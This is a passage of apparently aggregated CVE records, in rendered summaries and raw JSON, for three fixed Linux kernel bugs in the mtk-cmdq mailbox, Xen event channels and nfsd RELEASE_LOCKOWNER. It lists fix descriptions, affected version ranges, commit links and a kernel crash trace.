                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmailbox: mtk-cmdq: Fix pm_runtime_get_sync() warning in mbox shutdown\n\nThe return value of pm_runtime_get_sync() in cmdq_mbox_shutdown()\nwill return 1 when pm runtime state is active, and we don\u0027t want to\nget the warning message in this case.\n\nSo we change the return value \u003c 0 for WARN_ON()."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:16:56.861Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2d42a37a4518478f075ccf848242b4a50e313a46"
        },
        {
          "url": "https://git.kernel.org/stable/c/747a69a119c469121385543f21c2d08562968ccc"
        }
      ],
      "title": "mailbox: mtk-cmdq: Fix pm_runtime_get_sync() warning in mbox shutdown",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39492",
    "datePublished": "2024-07-10T07:14:10.967Z",
    "dateReserved": "2024-06-25T14:23:23.748Z",
    "dateUpdated": "2025-05-04T09:16:56.861Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26687 (GCVE-0-2024-26687)

Vulnerability from cvelistv5 – Published: 2024-04-03 14:54 – Updated: 2025-05-04 08:54

Title

xen/events: close evtchn after mapping cleanup

Summary

In the Linux kernel, the following vulnerability has been resolved: xen/events: close evtchn after mapping cleanup shutdown_pirq and startup_pirq are not taking the irq_mapping_update_lock because they can't due to lock inversion. Both are called with the irq_desc->lock being taking. The lock order, however, is first irq_mapping_update_lock and then irq_desc->lock. This opens multiple races: - shutdown_pirq can be interrupted by a function that allocates an event channel: CPU0 CPU1 shutdown_pirq { xen_evtchn_close(e) __startup_pirq { EVTCHNOP_bind_pirq -> returns just freed evtchn e set_evtchn_to_irq(e, irq) } xen_irq_info_cleanup() { set_evtchn_to_irq(e, -1) } } Assume here event channel e refers here to the same event channel number. After this race the evtchn_to_irq mapping for e is invalid (-1). - __startup_pirq races with __unbind_from_irq in a similar way. Because __startup_pirq doesn't take irq_mapping_update_lock it can grab the evtchn that __unbind_from_irq is currently freeing and cleaning up. In this case even though the event channel is allocated, its mapping can be unset in evtchn_to_irq. The fix is to first cleanup the mappings and then close the event channel. In this way, when an event channel gets allocated it's potential previous evtchn_to_irq mappings are guaranteed to be unset already. This is also the reverse order of the allocation where first the event channel is allocated and then the mappings are setup. On a 5.10 kernel prior to commit 3fcdaf3d7634 ("xen/events: modify internal [un]bind interfaces"), we hit a BUG like the following during probing of NVMe devices. The issue is that during nvme_setup_io_queues, pci_free_irq is called for every device which results in a call to shutdown_pirq. With many nvme devices it's therefore likely to hit this race during boot because there will be multiple calls to shutdown_pirq and startup_pirq are running potentially in parallel. ------------[ cut here ]------------ blkfront: xvda: barrier or flush: disabled; persistent grants: enabled; indirect descriptors: enabled; bounce buffer: enabled kernel BUG at drivers/xen/events/events_base.c:499! invalid opcode: 0000 [#1] SMP PTI CPU: 44 PID: 375 Comm: kworker/u257:23 Not tainted 5.10.201-191.748.amzn2.x86_64 #1 Hardware name: Xen HVM domU, BIOS 4.11.amazon 08/24/2006 Workqueue: nvme-reset-wq nvme_reset_work RIP: 0010:bind_evtchn_to_cpu+0xdf/0xf0 Code: 5d 41 5e c3 cc cc cc cc 44 89 f7 e8 2b 55 ad ff 49 89 c5 48 85 c0 0f 84 64 ff ff ff 4c 8b 68 30 41 83 fe ff 0f 85 60 ff ff ff <0f> 0b 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 0f 1f 44 00 00 RSP: 0000:ffffc9000d533b08 EFLAGS: 00010046 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000006 RDX: 0000000000000028 RSI: 00000000ffffffff RDI: 00000000ffffffff RBP: ffff888107419680 R08: 0000000000000000 R09: ffffffff82d72b00 R10: 0000000000000000 R11: 0000000000000000 R12: 00000000000001ed R13: 0000000000000000 R14: 00000000ffffffff R15: 0000000000000002 FS: 0000000000000000(0000) GS:ffff88bc8b500000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 0000000002610001 CR4: 00000000001706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: ? show_trace_log_lvl+0x1c1/0x2d9 ? show_trace_log_lvl+0x1c1/0x2d9 ? set_affinity_irq+0xdc/0x1c0 ? __die_body.cold+0x8/0xd ? die+0x2b/0x50 ? do_trap+0x90/0x110 ? bind_evtchn_to_cpu+0xdf/0xf0 ? do_error_trap+0x65/0x80 ? bind_evtchn_to_cpu+0xdf/0xf0 ? exc_invalid_op+0x4e/0x70 ? bind_evtchn_to_cpu+0xdf/0xf0 ? asm_exc_invalid_op+0x12/0x20 ? bind_evtchn_to_cpu+0xdf/0x ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9470f5b2503cae994…
	https://git.kernel.org/stable/c/0fc88aeb2e32b76db…
	https://git.kernel.org/stable/c/ea592baf9e41779fe…
	https://git.kernel.org/stable/c/585a344af6bcac222…
	https://git.kernel.org/stable/c/20980195ec8d2e416…
	https://git.kernel.org/stable/c/9be71aa12afa91dfe…
	https://git.kernel.org/stable/c/fa765c4b4aed2d642…

Impacted products

Vendor

Product

Version

Linux

Affected: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 , < 9470f5b2503cae994098dea9682aee15b313fa44 (git)
Affected: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 , < 0fc88aeb2e32b76db3fe6a624b8333dbe621b8fd (git)
Affected: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 , < ea592baf9e41779fe9a0424c03dd2f324feca3b3 (git)
Affected: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 , < 585a344af6bcac222608a158fc2830ff02712af5 (git)
Affected: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 , < 20980195ec8d2e41653800c45c8c367fa1b1f2b4 (git)
Affected: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 , < 9be71aa12afa91dfe457b3fb4a444c42b1ee036b (git)
Affected: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 , < fa765c4b4aed2d64266b694520ecb025c862c5a9 (git)

Linux

Affected: 2.6.37
Unaffected: 0 , < 2.6.37 (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.81 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.6 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:12.637Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9470f5b2503cae994098dea9682aee15b313fa44"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0fc88aeb2e32b76db3fe6a624b8333dbe621b8fd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ea592baf9e41779fe9a0424c03dd2f324feca3b3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/585a344af6bcac222608a158fc2830ff02712af5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/20980195ec8d2e41653800c45c8c367fa1b1f2b4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9be71aa12afa91dfe457b3fb4a444c42b1ee036b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fa765c4b4aed2d64266b694520ecb025c862c5a9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26687",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:53:07.213399Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:32.707Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/xen/events/events_base.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9470f5b2503cae994098dea9682aee15b313fa44",
              "status": "affected",
              "version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
              "versionType": "git"
            },
            {
              "lessThan": "0fc88aeb2e32b76db3fe6a624b8333dbe621b8fd",
              "status": "affected",
              "version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
              "versionType": "git"
            },
            {
              "lessThan": "ea592baf9e41779fe9a0424c03dd2f324feca3b3",
              "status": "affected",
              "version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
              "versionType": "git"
            },
            {
              "lessThan": "585a344af6bcac222608a158fc2830ff02712af5",
              "status": "affected",
              "version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
              "versionType": "git"
            },
            {
              "lessThan": "20980195ec8d2e41653800c45c8c367fa1b1f2b4",
              "status": "affected",
              "version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
              "versionType": "git"
            },
            {
              "lessThan": "9be71aa12afa91dfe457b3fb4a444c42b1ee036b",
              "status": "affected",
              "version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
              "versionType": "git"
            },
            {
              "lessThan": "fa765c4b4aed2d64266b694520ecb025c862c5a9",
              "status": "affected",
              "version": "d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/xen/events/events_base.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.37"
            },
            {
              "lessThan": "2.6.37",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.81",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.81",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.6",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxen/events: close evtchn after mapping cleanup\n\nshutdown_pirq and startup_pirq are not taking the\nirq_mapping_update_lock because they can\u0027t due to lock inversion. Both\nare called with the irq_desc-\u003elock being taking. The lock order,\nhowever, is first irq_mapping_update_lock and then irq_desc-\u003elock.\n\nThis opens multiple races:\n- shutdown_pirq can be interrupted by a function that allocates an event\n  channel:\n\n  CPU0                        CPU1\n  shutdown_pirq {\n    xen_evtchn_close(e)\n                              __startup_pirq {\n                                EVTCHNOP_bind_pirq\n                                  -\u003e returns just freed evtchn e\n                                set_evtchn_to_irq(e, irq)\n                              }\n    xen_irq_info_cleanup() {\n      set_evtchn_to_irq(e, -1)\n    }\n  }\n\n  Assume here event channel e refers here to the same event channel\n  number.\n  After this race the evtchn_to_irq mapping for e is invalid (-1).\n\n- __startup_pirq races with __unbind_from_irq in a similar way. Because\n  __startup_pirq doesn\u0027t take irq_mapping_update_lock it can grab the\n  evtchn that __unbind_from_irq is currently freeing and cleaning up. In\n  this case even though the event channel is allocated, its mapping can\n  be unset in evtchn_to_irq.\n\nThe fix is to first cleanup the mappings and then close the event\nchannel. In this way, when an event channel gets allocated it\u0027s\npotential previous evtchn_to_irq mappings are guaranteed to be unset already.\nThis is also the reverse order of the allocation where first the event\nchannel is allocated and then the mappings are setup.\n\nOn a 5.10 kernel prior to commit 3fcdaf3d7634 (\"xen/events: modify internal\n[un]bind interfaces\"), we hit a BUG like the following during probing of NVMe\ndevices. The issue is that during nvme_setup_io_queues, pci_free_irq\nis called for every device which results in a call to shutdown_pirq.\nWith many nvme devices it\u0027s therefore likely to hit this race during\nboot because there will be multiple calls to shutdown_pirq and\nstartup_pirq are running potentially in parallel.\n\n  ------------[ cut here ]------------\n  blkfront: xvda: barrier or flush: disabled; persistent grants: enabled; indirect descriptors: enabled; bounce buffer: enabled\n  kernel BUG at drivers/xen/events/events_base.c:499!\n  invalid opcode: 0000 [#1] SMP PTI\n  CPU: 44 PID: 375 Comm: kworker/u257:23 Not tainted 5.10.201-191.748.amzn2.x86_64 #1\n  Hardware name: Xen HVM domU, BIOS 4.11.amazon 08/24/2006\n  Workqueue: nvme-reset-wq nvme_reset_work\n  RIP: 0010:bind_evtchn_to_cpu+0xdf/0xf0\n  Code: 5d 41 5e c3 cc cc cc cc 44 89 f7 e8 2b 55 ad ff 49 89 c5 48 85 c0 0f 84 64 ff ff ff 4c 8b 68 30 41 83 fe ff 0f 85 60 ff ff ff \u003c0f\u003e 0b 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 0f 1f 44 00 00\n  RSP: 0000:ffffc9000d533b08 EFLAGS: 00010046\n  RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000006\n  RDX: 0000000000000028 RSI: 00000000ffffffff RDI: 00000000ffffffff\n  RBP: ffff888107419680 R08: 0000000000000000 R09: ffffffff82d72b00\n  R10: 0000000000000000 R11: 0000000000000000 R12: 00000000000001ed\n  R13: 0000000000000000 R14: 00000000ffffffff R15: 0000000000000002\n  FS:  0000000000000000(0000) GS:ffff88bc8b500000(0000) knlGS:0000000000000000\n  CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n  CR2: 0000000000000000 CR3: 0000000002610001 CR4: 00000000001706e0\n  DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n  DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n  Call Trace:\n   ? show_trace_log_lvl+0x1c1/0x2d9\n   ? show_trace_log_lvl+0x1c1/0x2d9\n   ? set_affinity_irq+0xdc/0x1c0\n   ? __die_body.cold+0x8/0xd\n   ? die+0x2b/0x50\n   ? do_trap+0x90/0x110\n   ? bind_evtchn_to_cpu+0xdf/0xf0\n   ? do_error_trap+0x65/0x80\n   ? bind_evtchn_to_cpu+0xdf/0xf0\n   ? exc_invalid_op+0x4e/0x70\n   ? bind_evtchn_to_cpu+0xdf/0xf0\n   ? asm_exc_invalid_op+0x12/0x20\n   ? bind_evtchn_to_cpu+0xdf/0x\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:54:04.797Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9470f5b2503cae994098dea9682aee15b313fa44"
        },
        {
          "url": "https://git.kernel.org/stable/c/0fc88aeb2e32b76db3fe6a624b8333dbe621b8fd"
        },
        {
          "url": "https://git.kernel.org/stable/c/ea592baf9e41779fe9a0424c03dd2f324feca3b3"
        },
        {
          "url": "https://git.kernel.org/stable/c/585a344af6bcac222608a158fc2830ff02712af5"
        },
        {
          "url": "https://git.kernel.org/stable/c/20980195ec8d2e41653800c45c8c367fa1b1f2b4"
        },
        {
          "url": "https://git.kernel.org/stable/c/9be71aa12afa91dfe457b3fb4a444c42b1ee036b"
        },
        {
          "url": "https://git.kernel.org/stable/c/fa765c4b4aed2d64266b694520ecb025c862c5a9"
        }
      ],
      "title": "xen/events: close evtchn after mapping cleanup",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26687",
    "datePublished": "2024-04-03T14:54:49.250Z",
    "dateReserved": "2024-02-19T14:20:24.154Z",
    "dateUpdated": "2025-05-04T08:54:04.797Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26629 (GCVE-0-2024-26629)

Vulnerability from cvelistv5 – Published: 2024-03-13 14:01 – Updated: 2025-12-23 16:39

Title

nfsd: fix RELEASE_LOCKOWNER

Summary

In the Linux kernel, the following vulnerability has been resolved: nfsd: fix RELEASE_LOCKOWNER The test on so_count in nfsd4_release_lockowner() is nonsense and harmful. Revert to using check_for_locks(), changing that to not sleep. First: harmful. As is documented in the kdoc comment for nfsd4_release_lockowner(), the test on so_count can transiently return a false positive resulting in a return of NFS4ERR_LOCKS_HELD when in fact no locks are held. This is clearly a protocol violation and with the Linux NFS client it can cause incorrect behaviour. If RELEASE_LOCKOWNER is sent while some other thread is still processing a LOCK request which failed because, at the time that request was received, the given owner held a conflicting lock, then the nfsd thread processing that LOCK request can hold a reference (conflock) to the lock owner that causes nfsd4_release_lockowner() to return an incorrect error. The Linux NFS client ignores that NFS4ERR_LOCKS_HELD error because it never sends NFS4_RELEASE_LOCKOWNER without first releasing any locks, so it knows that the error is impossible. It assumes the lock owner was in fact released so it feels free to use the same lock owner identifier in some later locking request. When it does reuse a lock owner identifier for which a previous RELEASE failed, it will naturally use a lock_seqid of zero. However the server, which didn't release the lock owner, will expect a larger lock_seqid and so will respond with NFS4ERR_BAD_SEQID. So clearly it is harmful to allow a false positive, which testing so_count allows. The test is nonsense because ... well... it doesn't mean anything. so_count is the sum of three different counts. 1/ the set of states listed on so_stateids 2/ the set of active vfs locks owned by any of those states 3/ various transient counts such as for conflicting locks. When it is tested against '2' it is clear that one of these is the transient reference obtained by find_lockowner_str_locked(). It is not clear what the other one is expected to be. In practice, the count is often 2 because there is precisely one state on so_stateids. If there were more, this would fail. In my testing I see two circumstances when RELEASE_LOCKOWNER is called. In one case, CLOSE is called before RELEASE_LOCKOWNER. That results in all the lock states being removed, and so the lockowner being discarded (it is removed when there are no more references which usually happens when the lock state is discarded). When nfsd4_release_lockowner() finds that the lock owner doesn't exist, it returns success. The other case shows an so_count of '2' and precisely one state listed in so_stateid. It appears that the Linux client uses a separate lock owner for each file resulting in one lock state per lock owner, so this test on '2' is safe. For another client it might not be safe. So this patch changes check_for_locks() to use the (newish) find_any_file_locked() so that it doesn't take a reference on the nfs4_file and so never calls nfsd_file_put(), and so never sleeps. With this check is it safe to restore the use of check_for_locks() rather than testing so_count against the mysterious '2'.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/10d75984495f7fe62…
	https://git.kernel.org/stable/c/99fb654d01dc3f08b…
	https://git.kernel.org/stable/c/c6f8b3fcc62725e41…
	https://git.kernel.org/stable/c/e4cf8941664cae2f8…
	https://git.kernel.org/stable/c/b7d2eee1f53899b53…
	https://git.kernel.org/stable/c/8f5b860de87039b00…
	https://git.kernel.org/stable/c/edcf9725150e42bee…

Impacted products

Vendor

Product

Version

Linux

Affected: ef481b262bba4f454351eec43f024fec942c2d4c , < 10d75984495f7fe62152c3b0dbfa3f0a6b739c9b (git)
Affected: 3097f38e91266c7132c3fdb7e778fac858c00670 , < 99fb654d01dc3f08b5905c663ad6c89a9d83302f (git)
Affected: e2fc17fcc503cfca57b5d1dd3b646ca7eebead97 , < c6f8b3fcc62725e4129f2c0fd550d022d4a7685a (git)
Affected: ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b , < e4cf8941664cae2f89f0189c29fe2ce8c6be0d03 (git)
Affected: ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b , < b7d2eee1f53899b53f069bba3a59a419fc3d331b (git)
Affected: ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b , < 8f5b860de87039b007e84a28a5eefc888154e098 (git)
Affected: ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b , < edcf9725150e42beeca42d085149f4c88fa97afd (git)
Affected: fea1d0940301378206955264a01778700fc9c16f (git)
Affected: 2ec65dc6635d1976bd1dbf2640ff7f810b2f6dd1 (git)
Affected: a2235bc65ade40982c3d09025cdd34bc539d6a69 (git)
Affected: ba747abfca27e23c42ded3912c87b70d7e16b6ab (git)
Affected: e8020d96dd5b2dcc1f6a8ee4f87a53a373002cd5 (git)

Linux

Affected: 5.19
Unaffected: 0 , < 5.19 (semver)
Unaffected: 4.19.306 , ≤ 4.19.* (semver)
Unaffected: 5.10.220 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.79 , ≤ 6.1.* (semver)
Unaffected: 6.6.15 , ≤ 6.6.* (semver)
Unaffected: 6.7.3 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26629",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T16:10:40.555857Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T16:10:48.664Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:07:19.714Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/99fb654d01dc3f08b5905c663ad6c89a9d83302f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c6f8b3fcc62725e4129f2c0fd550d022d4a7685a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e4cf8941664cae2f89f0189c29fe2ce8c6be0d03"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b7d2eee1f53899b53f069bba3a59a419fc3d331b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8f5b860de87039b007e84a28a5eefc888154e098"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/edcf9725150e42beeca42d085149f4c88fa97afd"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/nfsd/nfs4state.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "10d75984495f7fe62152c3b0dbfa3f0a6b739c9b",
              "status": "affected",
              "version": "ef481b262bba4f454351eec43f024fec942c2d4c",
              "versionType": "git"
            },
            {
              "lessThan": "99fb654d01dc3f08b5905c663ad6c89a9d83302f",
              "status": "affected",
              "version": "3097f38e91266c7132c3fdb7e778fac858c00670",
              "versionType": "git"
            },
            {
              "lessThan": "c6f8b3fcc62725e4129f2c0fd550d022d4a7685a",
              "status": "affected",
              "version": "e2fc17fcc503cfca57b5d1dd3b646ca7eebead97",
              "versionType": "git"
            },
            {
              "lessThan": "e4cf8941664cae2f89f0189c29fe2ce8c6be0d03",
              "status": "affected",
              "version": "ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b",
              "versionType": "git"
            },
            {
              "lessThan": "b7d2eee1f53899b53f069bba3a59a419fc3d331b",
              "status": "affected",
              "version": "ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b",
              "versionType": "git"
            },
            {
              "lessThan": "8f5b860de87039b007e84a28a5eefc888154e098",
              "status": "affected",
              "version": "ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b",
              "versionType": "git"
            },
            {
              "lessThan": "edcf9725150e42beeca42d085149f4c88fa97afd",
              "status": "affected",
              "version": "ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "fea1d0940301378206955264a01778700fc9c16f",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "2ec65dc6635d1976bd1dbf2640ff7f810b2f6dd1",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a2235bc65ade40982c3d09025cdd34bc539d6a69",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "ba747abfca27e23c42ded3912c87b70d7e16b6ab",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "e8020d96dd5b2dcc1f6a8ee4f87a53a373002cd5",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/nfsd/nfs4state.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.19"
            },
            {
              "lessThan": "5.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.306",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.220",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.79",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.15",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
